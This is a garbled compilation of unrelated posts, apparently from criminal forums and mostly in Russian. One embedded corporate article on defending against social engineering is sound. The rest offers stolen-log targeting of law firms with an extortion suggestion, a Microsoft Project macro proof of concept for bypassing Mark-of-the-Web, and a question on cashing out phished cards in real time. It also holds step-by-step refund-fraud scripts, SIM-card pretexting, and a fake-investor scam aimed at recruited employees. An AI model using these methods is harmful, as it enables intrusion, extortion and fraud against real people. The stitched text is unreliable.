If you dont know how to get logs for targets you find then i will help you out, just post your target in the thread and ill respond with logs for you. You should build up a large database of your own though eventually which can be made out of even all the free log dumps on a vps. Your targets should never be mainstream anyway so public logs are fine for you.
Let me know if everyone would be interested with more in depth, advanced methdology.
PS After further looking at clio it appears the built in credit card processor for charging clients might be even better with fast deposits and high amounts are normal. Or perhaps you could extort the attorneys for a payment as well since all the law firm confidential data is apparently available as well. Be creative, this was just quick writeup
Привет всем! Ну, что, давайте начнем
** Краткое описание** :
Что такое MOTW можно прочитать туттыц. Microsoft Project Document не входит в состав Microsoft Office по умолчанию, но в этом вижу только плюс, так как мы отсекаем нищебродов. Если на покемоне не установлен Microsoft Project, значит, он просто не сможет открыть данный формат. Вектор для атаки можно посмотреть тут тыц. Microsoft Project Document использует два формата (.mpp и .mpt), оба поддерживают макросы. Ну, и, кроме всего, это, насколько я знаю, единственный формат офиса, который обходит MOTW без архива.
Code:Copy to clipboard
Sub Auto_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc"
End Sub
](https://cloud.mail.ru/public/EqWL/7N7DckRnG)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
Всем привет.
Завел клиента на фиш. Ему преподносится это как возврат средств. Он вводит
данные карты, и после ему вылезет окошко для ввода кода подтверждения.
Куда можно параллельно в режиме реального времени вбить его карту и списать
сумму?
Карта будет либо visa либо mc
Нужны варианты без вещевухи, тк некуда принимать вещь. Если покупка то крипты или цифрового актива, который впоследствии можно будет продать
Вариант с pos тоже не очень подходит, тк объема у меня нет
Зачастую компании строят киберзащиту, ориентируясь прежде всего на технические векторы атак. Такие системы могут иметь высокий уровень зрелости и казаться надежными, но при этом оставаться уязвимыми для одной из самых опасных угроз — социальной инженерии, основанной на манипуляциях человеческим сознанием. По статистике, сегодня социнженерия так или иначе применяется в 97% таргетированных атак, при этом технические векторы подчас вообще не используются или используются минимально. На первые места среди угроз ИБ методы социнженерии ставит и Gartner, а ряд ученых утверждает, что если социальная инженерия возьмет на вооружение технологии машинного обучения и искусственного интеллекта, то человечество получит угрозу, сопоставимую с глобальным потеплением и ядерным оружием. В статье мы разберемся в масштабах проблемы и поделимся нашим подходом к ее системному решению.
4 мифа о социальной инженерии
** Социнженерия — ограниченный набор техник.** Принято считать, что
социальная инженерия ограничивается фишингом, подкидыванием зараженных флеш-
накопителей, обманом в соцсетях и телефонным мошенничеством. В
действительности речь идет о практически бесконечной комбинации технических и
нетехнических техник, образующих комплексные стратегии.
Социнженерия — часть кибератак. Напротив, кибератака может быть частью
общей стратегии, основную долю которой занимает социнженерия.
С социнженерией можно столкнуться случайно. На самом деле социнженерия
всегда реализуется таргетированно. В простейших случаях ее фокус направлен на
организацию, в более продвинутых — на конкретного человека.
Социнженерия возможна из-за низкого уровня ИБ-осведомленности или низкого
уровня зрелости ИБ-системы организации. В действительности социальная
инженерия по определению действует от разведанного уровня ИБ-осведомленности и
уровня зрелости системы ИБ, для чего всегда начинается с изучения объекта
атаки. Часто это самый продолжительный и трудоемкий этап работы социального
инженера.
Социальная инженерия: границы возможностей
В продвинутых вариантах социнженерия представляет собой изощренные стратегии,
реализуемые «профессиональными» командами мошенников и технических
специалистов различных профилей. Чтобы представить, на что они способны,
рекомендую изучать не только известные киберинциденты, связанные с
эксплуатацией проблем человеческого фактора, а изучить биографии самых
выдающихся социальных инженеров (в т.ч. профессиональных жуликов) за последнее
столетие. Так, Виктор Люстиг сумел продать Эйфелеву башню несколько раз вполне
неглупым людям. Джозеф Уэйл по кличке «желтый кидала» заработал 400 тысяч
долларов на создании фиктивного банка (на месте здания легитимного банка).
Фрэнк Абигнейл за 5 лет преступной деятельности распространил фальшивые чеки
на сумму 2,5 млн долларов в 26 странах мира, а его биография легла в основу
фильма «Поймай меня, если сможешь». Слепые от рождения братья Бадир
реализовали в 1990-е годы в Израиле несколько крупных схем мошенничества с
использованием социальной инженерии, взяв на вооружение их способность слышать
более широкий спектр звуков и подделки голоса. И наконец легендарный Кевин
Митник — хакер и специалист по кибербезопасности одновременно, автор
нескольких книг по социнженерии и взломам — мастерски использовал в
социальной инженерии техники телефонного мошенничества.
Как же работает социальная инженерия? Каждая стратегия предполагает несколько
этапов, и чем выше уровень злоумышленника, тем меньше он будет следовать
каким-то определенным скриптам последовательности действий. Пример жизненного
цикла и фреймворка таких атак представлен на рисунках ниже.
Рисунок 1. Жизненный цикл социальной инженерии
Рисунок 2. Фреймворк социальной инженерии
Каждый этап содержит потенциально бесконечные комбинации нетехнических мер:
техники инициации, первичной обработки, предлогов, извлечения информации,
влияния, обмана и манипуляции, НЛП.
Отдельно нужно остановиться на атаках на уровень подсознания. Это крайне важно
для понимания границ возможности защиты от изощренных атак социальной
инженерии. Это больше теоретическое обоснование «на пальцах», но его
достаточно для понимания проблематики. Если рассматривать социнженерию как
одну из ТОП-3 угроз человечеству, то в первую очередь тут идет речь о «взломе»
подсознания человеческого мозга, т.е. когда действия атакующих направлены не
на уровень сознания, а на уровень на подсознания. Ряд упомянутых выше
гениальных социальных инженеров, возможно, даже не предполагали, что зачастую
воздействовали именно на подсознание человека. Именно в нем сосредоточены наши
вычислительные мощности (по разным оценкам 95-99,99%) и процессы когнитивной
деятельности (по разным оценкам около 95%), что обуславливает масштаб
проблемы. При этом, если сознание по своей природе может блокировать попытки
воздействия на него, то подсознание им не сопротивляется. И уже это определяет
границы возможностей ИБ-осведомленности, действующей в основном на уровне
сознания. На этом принципе основана наиболее продвинутая техника социальной
инженерии — система активаций, которые приводят подсознание жертвы к
необходимому для атакующего решению.
Рисунок 3. Воздействие на сознание и подсознание
Примеров из жизни (даже легитимных) привести можно много. С подобными
воздействиями сталкивается каждый человек как минимум раз в неделю, посещая
супермаркет. Расположение товаров на полках, формы и изображения на упаковке
— все это техники, используемые сетевыми маркетологами для убеждения
покупателей приобрести конкретный продукт. Простой пример: на витрине
намеренно размещается яркий товар с угловатыми формами логотипа или рисунка,
который с большой вероятностью не будет одобрен подсознанием потребителя, но
привлечет его внимание к определенной полке. Это делается специально, чтобы
далее он заметил более приемлемые его подсознанию (по форме и рисунку) товары
на той же полке. Аналогичным образом размещение на полках одинаковой или
разнообразной продукции имеет вполне четкий и обоснованный смысл и выполняет
конкретную задачу. По сути мы имеем дело с недекларированными для сознания
реакциями подсознания. Я называю их «уязвимостями» мозга, хотя по большому
счету это нормальные и даже необходимые реакции, сформированные эволюцией в
доисторическом мире. Предусмотреть их все сознательно — дело, фактически
невозможное в современной жизни.
Любопытно, что количество подобных потенциальных «уязвимостей» человеческого
мозга на порядки выше, чем у любого самого продвинутого программного
обеспечения. Это грубая оценка, основанная на количестве потенциальных
состояний мозга и размерах памяти в сравнении со среднестатистическим ПО на
компьютере. Можно смело утверждать, что область защиты сознания и подсознания
сегодня намного уступает традиционной киберзащите.
В поисках решения
Не найдя в открытых источниках готового ответа на вопрос, как же правильно (и главное системно) бороться с угрозой в ИБ №1, мы решили провести собственное исследование, которое должно было помочь нам выработать системный подход против социальной инженерии. Первым делом мы обратились к лучшим практикам: матрицам MITRE ATT&CK, стандартам NIST и [SANS](https://www.sans.org/security-awareness-training/blog/security- awareness-maturity-model). Прежде всего нас интересовали методики детектирования и реагирования на инциденты ИБ, а из превентивных мер, несмотря на важность остальных техник, мы выделили повышение ИБ-осведомленности.
В чем польза и сложности матриц MITRE?
Матрицы MITRE декомпозируют тактики злоумышленников на множество отдельных
техник, категорируемых по этапам реализации атак. Это позволяет сформировать
оптимальные по охвату и эффективности наборы сценариев выявления атак под
конкретные модели угроз.
Какие тут возникают сложности с социальной инженерией? Возьмем матрицу PRE
ATT&CK: хотя около 40% описанных в ней техник относятся к социальной
инженерии, всё же она сосредоточена на этапах подготовки к атаке, в рамках
которых у нас почти нет шансов предсказать или обнаружить намерения
компрометации. Конечно, существуют техники HUMINT (Human Intelligence) — по
сути агентурная сеть, выявляющая намерения злоумышленников, — но это больше
про спецслужбы. Есть также техники анализа Darknet и профильных хакерских
ресурсов, заключающиеся в поиске следов подготовки к крупным кибероперациям,
но и это очень негарантированный подход, а скорее даже случайный.
Что же касается основных матриц MITRE, например, Enterprise ATT&CK, то тут мы
уже имеем дело с этапами реализации технических векторов киберугроз (элементы
социнженерии получаем на этапе Initial Access в виде техник подкидывания
съемных носителей — Baiting-атаки). С большой вероятностью квалифицированный
злоумышленник будет пытаться миновать используемые в организации техники
обнаружения — а он будет о них осведомлен — посредством социальной инженерии
до тех пор, пока шансы на его обнаружение не станут минимальными.
Рисунок 4. Сценарий применения социнженерии для обхода техник детектирования
на примере MITRE Enterprise ATT &CK
Нужно также иметь в виду, что MITRE сосредоточена на компрометации конкретных
активов (операционных систем) в разрезе таргетированных угроз. Поэтому часть
сценариев вне MITRE должны быть посвящены другим ИБ-угрозам для инфраструктур.
С учетом всех перечисленных сложностей в части детектирования угроз мы пришли
к выводу, что наш подход должен учитывать два момента:
1. Не допустить или минимизировать шанс минования технических мер обнаружения
киберугроз.
2. Максимально полно реализовать прямые и косвенные сценарии выявления
технических и нетехнических техник социальной инженерии.
Как повышать ИБ-осведомленность?
ИБ-осведомленность остаётся основной превентивной техникой борьбы с социальной
инженерией. В качестве ориентира тут можно взять модель зрелости Security
Awareness SANS — в ней имеет смысл рассматривать как минимум третий уровень.
Все, что находится ниже, означает полную уязвимость инфраструктуры и
информационных систем с точки зрения информационной безопасности, независимо
от того, как в организации реализована киберзащита.
Рисунок 5. Модель повышения ИБ-осведомленности SANS
Основа подхода
Параллельно, в качестве основы нашего подхода, мы выбрали трехуровневую модель
зрелости центров мониторинга и реагирования (соответствует 5 уровням зрелости
CMM Университета Карнеги — Меллона): ad-hoc (зарождающийся),
maturing (созревающий) и strategic (стратегический). По нашим оценкам,
большинство систем ИБ как в России, так и за рубежом можно отнести к первому
уровню этой модели. Поэтому именно от него мы почти всегда будем отталкиваться
при развитии центров мониторинга и реагирования на инциденты ИБ, методично
повышая зрелость по всем компонентам.
Рисунок 6. Повышение зрелости Incident Response
Атакующих нужно знать «в лицо»
Далее мы соотнесли с матрицей зрелости SOC/CSIRT логику и мотивы атакующей
стороны. Воздействие нетехническими методами означает для злоумышленника
довольно высокие риски деанонимизации, т.е. засветиться и попасться в процессе
или после реализации угрозы. Например, при физическом проникновении в офис
атакуемой организации его могут отследить с помощью системы видеонаблюдения.
Поэтому с большой вероятностью злоумышленник будет стремиться реализовать
атаку техническими векторами. Казалось бы, это нам и нужно. Однако чисто
техническим способом достаточно сложно взломать более зрелые системы, да и
стоимость эксплоитов 0-day для взлома серьезно защищенных инфраструктур и
информационных систем может достигать сотен тысяч, а иногда и миллионов
долларов. Здесь злоумышленник, скорее всего, повысит свои риски, чтобы
упростить и удешевить реализацию, и прибегнет к социальной инженерии. Наша
задача — максимально «приземлить» атакующего на технический уровень или хотя
бы исключить реализацию нетехнических техник, тем самым повысив шансы на
обнаружение злоумышленника. Как это можно сделать? Повышая ИБ-осведомленность.
Рисунок 7. Логика атакующей стороны
Разумеется, для каждой организации тут будет свой типовой злоумышленник.
Поэтому еще один компонент, который лег в основу нашего подхода, — риск-
профилирование потенциальных атакующих.
Системный подход против социальной инженерии
Результатом наших изысканий стал подход, суть которого заключается в
методичном повышении уровня зрелости ИБ-осведомленности, процессов мониторинга
и реагирования на ИБ-инциденты, а также в реализации комплекса
специализированных сценариев выявления техник социальной инженерии.
Как мы этом делаем? Под каждого заказчика изучается профиль атакующего. Далее
на его основе разрабатывается способ повышения уровня полноты детектирования
за счет увеличения количества точек снятия информации, расширения сценарного
набора (числа идентифицируемых угроз) и контекста, которым мы наполняем эти
сценарии. При этом контекст делится на 3 плоскости: пользователи, активы и
защищаемые данные. Все это реализуется параллельно с повышением возможностей
реагирования и ИБ-осведомленности.
Рисунок 8. Повышение зрелости CSIRT/SOC
Рассмотрим, как работает наш подход, на примере источников событий. На первом
этапе мы собираем в основном статичные данные и в меньшей части поведенческие.
Некоторые из последних стоит добавлять сразу, чтобы уже на этом этапе суметь
поймать злоумышленника, который при попытке реализовать сложную
таргетированную атаку будет стремиться миновать все используемые техники
детектирования и оказаться на финальных этапах взлома. Например, та же DLP-
система здесь может стать хорошей компенсационной мерой. Однако многие другие
поведенческие механизмы стоит включать на хорошем уровне зрелости, т.к. они
могут избыточно генерировать ложные срабатывания. На низких уровнях зрелости
это будет снижать общую эффективность. На последующих этапах, по мере
увеличения зрелости, мы увеличиваем количество источников, с которых снимаем
информацию: системные события, события ИБ Real-time, сигнатурные и
поведенческие данные.
Рисунок 9. Пример. Источники событий
Приведем еще один пример – из плоскости активов, т.е. контекста, которым мы
наполняем наши сценарии. Сначала у нас есть базовый набор, далее мы ищем
информацию, чтобы его дополнить, — и так вплоть до полного покрытия.
Возникает закономерный вопрос: почему не включить все это сразу? Причина в
том, что без соизмеримого развития процессов такие действия могут привести к
повышенному числу ложных срабатываний, на которые придется потратить
избыточное количество ресурсов. В итоге это негативно скажется на других
процессах, общая эффективность снизится.
Рисунок 10. Пример. Модель активов. Собираемый контекст
Повышение зрелости процессов мониторинга происходит в циклическом формате, то
есть мы изучаем злоумышленника и поверхность угроз, формируем сценарную базу,
наполняем ее контекстом, пишем корреляционные правила — и так по циклу.
Рисунок 11. Повышение зрелости мониторинга инцидентов
Важный аспект нашего подхода — дополнительный фокус на маркерах социальной
инженерии при разработке сценарной логики. Это могут быть как прямые сценарии
по техническим векторам социальной инженерии, так и косвенные (применимые для
обнаружения косвенных признаков нетехнических векторов социальной инженерии).
К первым можно отнести фишинг, заражение веб-сайтов ВПО (watering hole),
регистрацию доменов, созвучных с названиями популярных сайтов (typesquatting),
целевые атаки на руководство компании (whaling attack), подкидывание
вредоносных флеш-носителей (baiting), несанкционированный проход в офис
компании вместе с сотрудником (piggybacking), рассылку вредоносных ссылок с
помощью коротких СМС-сообщений (SMiShing) и т.д. Примерами косвенных маркеров
служат всевозможные DLP-, UBA- и TBA-сценарии. Значимость этих маркеров
заключается в том, что они позволяют выявлять нетехнические векторы.
Например, в случае с подкинутыми флешками можно использовать инфраструктурные
возможности, проводить Windows-аудит, а также пытаться отлавливать попытки
запуска системных процессов с носимых источников информации (события Microsoft
Windows ID 4663 и 4688). То же самое работает и с Linux-системами. Причем по
возможности все это стоит делать системным аудитом, чтобы не увеличивать
стоимость мониторинга. Специализированные решения тут — крайний вариант.
Хочется добавить, что понимание маркеров социальной инженерии важно не только
на этапе мониторинга, но и в части реагирования, постинцидентного анализа и
форензики. А кроме того, не лишним будет подключить к этой работе ИБ-
специалиста, основной профиль которого — социальная инженерия. По нашему
опыту в Jet CSIRT, взаимодействие blue team (защитников) и red team (этичных
хакеров) существенно повышает шансы ИБ-команды дать отпор злоумышленникам,
строящим атаки на человеческом факторе.
Все помним тему с яндекс такси, где достаточно было написать в поддержку о том
что водитель проехал на красный свет или курил во время поездки?
Случай из той же оперы.
1. Заходим в приложение Яндекс.Такси, uber, gett
2. Выбираем поездку за последние 1-2 недели (лучше 1 неделю)
3. Жмем "Помощь с заказом" »»» "Хочу пожаловаться" »»» "Другая проблема"
4. Вписываем этот текст либо что-то подобное:
Добрый вечер. Водитель агрессивно вёл машину мне было страшно ехать с ним,
оскорблял всех матом на дороге на других. Из-за его невнимательности мы чуть
не попали в дтп. Вышел из машины весь потный в большом шоке
Таксист сдачу не отдал и хамски при этом себя вёл - ухмылялся, оскорблял
нищебродом и пр.
Водила просил отменить заказ.
Можно добавить драматичности и правдоподобности, чтобы увеличить вероятность
успешного рефа.
5. Получаем первое сообщение от бота , второе будет уже с промокодом от 500
до 1000р. Я получил 500 на одном и 1000 на другом, либо получаем реф .
Они дают промокоды, и порой щедры. Кофеварку ценой в 2к руб дали промо номиналом на 1400 руб, при покупке от 1401. Я охуел не меньше чем он.
В общем суть темы. Покупаем любой нужный вам товар на яндекс маркете,
предварительно бесплатно подключив яндекс плюс (отключите автоматическое
продление подписки)
https://music.yandex.ru/promo/music_web_ru_2m1r_v3
что это нам дает? кешбек баллами которые мы будем тратить на тест покупки,
бесплатная доставка даже самых дешевых заказов, лояльность к клиенту
повышается.
Рассмотрим пример со скринов выше.
Часто они даже не просят фото, достаточно просто эмоционально и много текста им написать и они за просто и пойдут на уступки чтоб не заниматься возвратом.
Как связываться? Я связываюсь через ВК. Но там чаще будут просить фото. Просто
пишите в личку их сообщества
https://vk.com/yandex.market
Более классный способ написать отзыв НА НИХ у НИХ же
[https://market.yandex.ru/shop--yandex-
market/431782/reviews?clid=703](https://href.li/?https://market.yandex.ru/shop
--yandex-market/431782/reviews?clid=703)
Там фото не нужно, сразу только припишите номер заказа. Т.к. отзыв публичный
то они будут ОСОБЕННО заинтересованы в удалении или редактировании отзыва. Доп
фото вряд ли будут запрашивать, и предложат щедрое промо.
Промкоды приходят на почту аккаунта с которого вы делали заказ. Промокод
суммируется с баллами яндекса, так же его можно использовать на других
аккаунтах.
Все заказы с 1 аккаунта. конечно если вы решили обращаться к ним через ВК, то
не стоит им писать каждый раз с 1 и той же странички. Если вы пишите отзывы на
самом маркете, то отзыв вам дается возможность написать только 1 раз. Значит
полученный промокод используйте уже на новом аккаунте чтоб уже с него написать
очередной негативный отзыв.
К слову я жаловался на каждый заказ. Нигде мне не отказывали и не оставляли без промокода. То есть получается я сделал 1 заказ, пожаловался получил промо, сделал новый заказ уже с промо, и на этот заказ с промо я снова пожаловался. Так я получал цикл промокодов из халявы) Как вы могли заметить заказы у меня мелкие, если вы будете заказывать что то в районе 1000 - 2000 - 3000 то промокоды тоже будут соответственно больше.
Перед тем как оформлять товар, если вы хотите в дальнейшем получить промо. Сразу планируйте хотя бы немного историю что и как вы будете писать. Например как с РГБ лентой, пруфы что лента не того цвета пришла вполне реальные (были еще давно куплены ленты с выбором цветов. поставил зеленый цвет и сфоткал им их, в случае с ргб лентой даже фотки не нужны были. сами предложили возврат. Да, сервисы многие идут на уступки, Деливери, Яндекс Такси
Если перестали давать делаем 1 акк=новый ip, железо, одна жалоба. Так же можете искать раскаченные акки знакомых и просить их заказать, только не говорите про схему просто передайте им чтобы спор открыли и фотки отфотошопленные вышлите типо вы не при делах, это таким прислали.
Актуально ли делать самореги, вбивать с андроида? Какие версии\прошивки\вендоры лучше всего заходят?
Доброго времени суток, пишу статью в первый раз. Этот маник подойдет для тех, кто имеет серый бизнес в онлайне. И так начнем.
Итог: Мы имеем деньги в налички, которые смогли вывести, не затрагивая наших данных.
Жду Ваших комментариев по поводу этой схемы.
В офисах Билайн есть бесплатные сим карты которые можно оформить на себя до 5
штук с каждого салона в вашем городе.
Что же нужно для их получения?Паспорт и язык.
Берем паспорт и идем в ближайший салон Билайна
На кассе просим оформить дополнительную сим карты для основного тарифа (тарифы
на фото выше)
Если попросят номер к которому привязывать говорим что основной номер оформлен
не на нас
Даем паспорт и ждем пока вам оформят ваши сим карты
Идем в следующий офис и проделываем там тоже самое
Куда их использовать решать только вам
Повторять можно раз в месяц
Примерный диалог с консультантом
Вы:Здравствуйте, нужны доп. сим карты для основного тарифа 3 шт
К:Здравствуйте, к какому номеру привязывать будете?
Вы:Не знаю,родственник(Папа,мама) попросили оформить
К:хорошо, можно ваш паспорт
После этого вы получите ваши сим карты и договор.
Суть в том что консультанты не имеют права привязать к номеру телефона(тарифу)
доп. симкарты без владельца,а доп. симкарты нулевые выдавать обязаны и выдают.
Всем добра!
Долго думал писать или нет(так как сильно худ. писмом не обладаю), но смотря
по крайним темам в СИ, решил что поделюсь темкой, которой увлекаюсь уже на
протежении 2-3 лет стабильно. Сразу оговорюсь, нужный мат. буду писать на
русском, без своих бурж. переводов, для Вас только для общего понимания и чтоб
для тех кто захочет опробывать, было легче перефразировать и потом уже
переводить на нужный Вам язык.
Ну что начнем.....
В нашем мире все хотят много денег быстро, и чтоб обязательно ничего не
делать. Каждый человек мечтает о хорошем доходе, красивой тачке или доме на
берегу океана. Одни пытаются вложить в собственный бизнес, другие играют на
FOREX- е или вкладывают свои деньги в очередную пирамиду, крипту на хайпе. В
надежде на быстрое преумножение денежных средств, они думают, что успеют
заработать и соскочить до обвала пирамиды. Хотя есть и те, которые просто в
виду своей необразованности или неопытности в этом мире даже не догадываются,
что это пирамида/хайп. Есть и такие, которые знают, что на «реальных инвест -
проектах» люди зарабатывают очень хорошо, но они не знают, как и куда вложить.
Многие наверное хоть раз в жизни слышали, как очередной друг или знакомый
рассказывал о том, что «Петя» косит бабло лопатой вот только не признается
как, вроде «инвестирует в высокодоходный бизнес». Но в какой? А эта тайна
закрыта семью замками…И если она даже известна, вы все же будете долго сидеть
за бокалом пива и обсуждать «все это бред и наебалово, или простая пирамида
которая скоро рухнет». Но наш менталитет на подсознательном уровне заставляет
верить в правдивость таких историй и в тоже время дискутировать на наличие
лжи. И вот однажды ваш друг, который повествовал вам о «прекрасной доходности
Пети», приезжает к вам на новом 200-м land cruiser-е. За дорогой выпивкой в
одном из лучших ресторанов он расскажет свою тайну успеха, что так же как и
«Петя» пошел инвестировать, и вложив бабло, он получает прибыль до 200% в
месяц. И теперь вас начинают терзать сомнения «а может это все правда, и
инвестиции принесут вам тот долгожданный Грааль богатства и успеха» ведь слухи
слухами, а вот передо мной живое подтверждение сверх доходности вложений и
работоспособности данного вида заработка. Друга этого вы знаете давно и ничем
грандиозным он не выделялся, а тут Крузак новый и дом начал строить…И вот вы
становитесь счастливым инвестором «грандиозного проекта» который в скором
времени сделает вас богатым и успешным.
С этой пред истории уже три темы можно сделать)) Но к чему я это все веду? Люди более склонны верить знакомым, друзьям или просто оппонентам с которыми только познакомились, в том случае если видят их успех а не просто рассказы. Согласитесь, если вы познакомитесь в среднем баре с человеком, в небрежно одетом состоянии и полупустым кошельком, рассказывающего вам что он является директором крупного холдинга и у него яхта длиной 50м. Вы ему просто не поверите, и пропустите все мимо ушей. Но когда вы сидите в дорогом ресторане и в зал в сопровождении охраны входит импозантный мужчина с золотыми часами, а на улице его ожидает Rols Roys, и вы «как-бы невзначай» услышите от людей, сидевших за соседним столиком, что он директор крупного холдинга. Здесь вы уж точно поверите!
Я уже начал глубоко копать, давайте перейдем к схеме.
Суть темы:
Оговорюсь, работаем строго по буржуям, во-первых их не жалко, во-вторых в
бурж. сегменте инвестиционка развита намного сильнее и поверьте с получений
зп/пособий и тому подобного они обязательно какую-то долю куда-то да
вкладывают, не верите можете просто поизучать паблик логи!!!
Мы будем представляться частным инвестором или «закрытым клубом» и набирать
персонал в виде личного секретаря или помощника.
И на чем же мы будем зарабатывать?
А зарабатывать мы будем на своих сотрудниках. Кто догадался молодец, кто нет,
читаем дальше.
**А теперь все по порядку!
50 почт.:**
Можете купить самореги или зарегистрировать почты сами, но обязательно чтоб они были похожи на почты живых людей, которые ее пользуются, например:
john.doe @ gmail.com или john.smith @yahoo.com и также распредиляем по почтовым зонам более-менее равномерно, чтоб не получилось 25 gmail и 25 yahoo и все. Сохраняем их в excel файл в три столбца, первый столб Ф.И.О. во второй почта, а в третий пароль. Я думаю с этим мы разобрались, едем дальше.
Корпоративная почта или публичная:
Создаем корпоративную или публичную почту, нf зарубежных хостах и обязательно малознакомую вроде aol.com/zoho.com.Если создаете публичную, то их нам понадобится штук 30-40.Если корп. то думаю с этим понятно. Одну мы будем использовать под себя, а остальные будем раздавать сотрудникам для переписки с нашими клиентами. Одна почта для каждого сотрудника.
Персонал:
Размещаем объявления по доскам/бордам/социалкам о наборе персонала такого как:
**Помощник руководителя;
Секретарь;
Надомная работа; **
И т. д. и т. п.
Объявление может выглядеть так(на русском как пример):
« На постоянную работу с гибким графиком требуются активные целеустремлённые
сотрудники. Требование: от 23 до 55 лет грамотность, способность обучаться,
уверенное владение ПК, креативность, коммуникабельность, доброжелательность,
ответственность.
Обязанности: сопровождение клиентской базы, обработка входящей и исходящей
корреспонденции, общение с клиентами в переписке. Условия: работа из дома,
гибкий график, сдельная оплата труда 20 000р, премии, обучение за наш счет.
Собеседование. Оставляйте мейл**.**»
Зарплату выставляйте среднюю по штату/городу/стране/региону страны, в котором набираете персонал. При высокой заработной плате будет очень заметно что вы не профессиональный «инвест брокер» так- как менталитет этих людей делает их довольно жадными и они ценят свои деньги.
Кошелек:
С этим я думаю у Вас проблем не возникнет, можете как сами регнуть/так и купить на просторах глобалки!!! Но одно "но": Данные на кого оформлен кошелек, нам нужны для того чтоб представляется перед нашими сотрудниками, и для создания зарубежных мыл.
И так вы все сделали и к вам на мыло полетели разные вариации вопросов, и тому подобного. Далее пишем, следующее:
_«Добрый день, меня зовут John Doe. Я являюсь частным инвестором и мне нужен помощник для ежедневного уведомления моих партнеров инвесторов о «состоянии их дневной прибыли» и текущей позиции их инвестиций. В ваши обязанности будет входить отправка писем для моих инвесторов. Вы будете получать Excel файл с дневной статистикой. С этого файла вы формируете письма и рассылаете их клиентам. Статистику вы получаете с ПН по ПТ с 16-00 до 21-00 вам нужно сформировать письма и отправить их клиентам не позднее 23-00. З/П я начисляю каждого 1-го числа и перечисляю ее на ваш кошелек "ТУТ КАКОЙ ВЫБЕРИТЕ,ДЛЯ РАБОТЫ". Если вас устраивают условия, отправляйте мне свое резюме. После рассмотрения я отправлю вам доступ к рабочей почте и детальную инструкцию по формировке писем. Первый день будет тестовым, далее если вы справитесь, будете приняты на работу.
C Уважением, John Doe.»
Далее вам начнут писать люди, которых заинтересовало предложение и они готовы работать. Вы отправляете инструкцию по формировке писем, которую я вам приложил(не забываем перевести на БУРЖУЙСКМЙ ЯЗЫК). Ваш сотрудник пока читает инструкцию, вы создаете excel файл, 46-48 человек (желательно подготовить его заранее) в таком виде:
Ф.И.О. - вставляем инициалы с нашего первого файла с почтами.
Почта – вставляем почты с первого файла.
ИК – прописываем суммы в таком виде:
70% сумм от 5.000 до 30.000;
20% сумм от 2.000 до 5.000;
10% сумм от 1.000 до 2.000/
После этого заполняем инвест группу так как дальше ПДД и ПМД высчитываются на основании группы.
ПДД – указываем средний в зависимости от группы, например:
_Если это группа С – то прописываем от 3.5 до 6.0%.
Если это группа В – то прописываем от 2.8 до 4.0%
Если это группа А – то прописываем от 1.3 до 2.0%_
ПМД – указываем на основании группы и даты когда отправляем, например:
_Если вы сбрасываете сотруднику5-го числа, тогда для группы «С» число будет от 17.5 до 30%
Для группы «В» число будет от 14.0 до 20.0%
Для группы «А» число будет от 6.5 до 10.0%
Если вы сбрасываете сотруднику 10-го числа, тогда для группы С число будет от 35.0 до 60%
Для группы «В» число будет от 28.0 до 40.0%
Для группы «А» число будет от 13.0 до 20.0%
Старайтесь не использовать круглых чисел!!!_
Общий баланс – высчитываем сами и прописываем (если не знаете как, читайте инструкцию для сотрудников)
РПИ – прописываем на основании группы, только выбираем 2-3 позиции, где завышаем на несколько процентов от максимального группы.
Инвест группу – указываем в таком виде:
_60% – Группы «В»
30% - Группы «А»
10% - Группы «С»
Также можете вставить одинаковых инвесторов в разные группы с разными суммами(что покажет что Ваши клиенты вкладывают Вам и не по разу).__
У вас все готово и ваш сотрудник прочел инструкцию. Далее отправляете ему файл и доступ к одной из почт, которые подготовили для сотрудников (только записывайте в отдельный файл, дату, почту его и почту которую вы ему отдали). Таким образом, набираете 30 -40 человек (чем больше, тем лучше). Остается только ждать, и один раз в день сбрасывать им новый файл (вы можете сразу сделать 10-15 файлов, только подписать их датами). Все это займет дней 10-15, на протяжении которых вы еще можете писать о разных мелочах с почты клиента, или просить уведомить инвесторов о новом «сверхдоходном» проекте (но это уже разогрев).
И так, ваш персонал каждый день старается переварить эти все ИК, ПМД, ПДД, РПИ, этапы, группы и т.д, и т.п. От этого у них начнут закипать мозги. И их начнут терзать мысли, о том что люди зарабатывают по 300 – 700$ в день, а они в месяц в два раза меньше. У них в голове будут крутиться суммы денег, которые они могут заработать, если станут инвесторами. На этом этапе 30 - 40% из них будут задавать вам разные вопросы «кто такие эти инвесторы?» «а как они зарабатывают?» «как стать инвестором?» «сколько нужно денег, чтоб стать инвестором?» Также они могут задать такие вопросы вашим инвесторам (поэтому просматривайте почты инвесторов раз в 3- 4 дня) Но самое главное!!! Что они не будут сомневаться в том, что на этом можно заработать быстро, легко и ОЧЕНЬ МНОГО ДЕНЕГ. На эти вопросы вы отправляете следующие:
« _Добрый день, Имя Отчество сотрудника)
Инвестор – это частные лица размещающее капитал с целью получения прибыли. Зарабатывают они за счет продажи продукции инвест - проекта. Чтоб стать инвестором достаточно выбрать группу и подписать со мной договор. Минимальная сумма инвестиций 500$ максимальная сумма зависит от определенных проектов групповой категории.»_
Если будут интересоваться «как вы работаете» «во что инвестируете» «как долго вы этим занимаетесь» пишем:
«Я занимаюсь инвестициями более 7 лет, инвестирую в краткосрочные сверхприбыльные проекты (от 500%). Инвестирую в Стартапы, бизнес планы, ноу- хау или готовый бизнес. Привилегию делая на IT- разработки ( игры, программное обеспечение,crypto-индустрия) и инновационные разработки в сфере TECH. Также я привлекаю денежные средства заинтересованных инвесторов в развитие проэкта, и получения дивидендов. Сейчас я нахожусь в Австралии, где работаю с одним из моих проектов (здесь можете написать какой проект его вы можете посмотреть на сайте kickstarter.com, в разделе tehnology) в который буду привлекать частных инвесторов.»
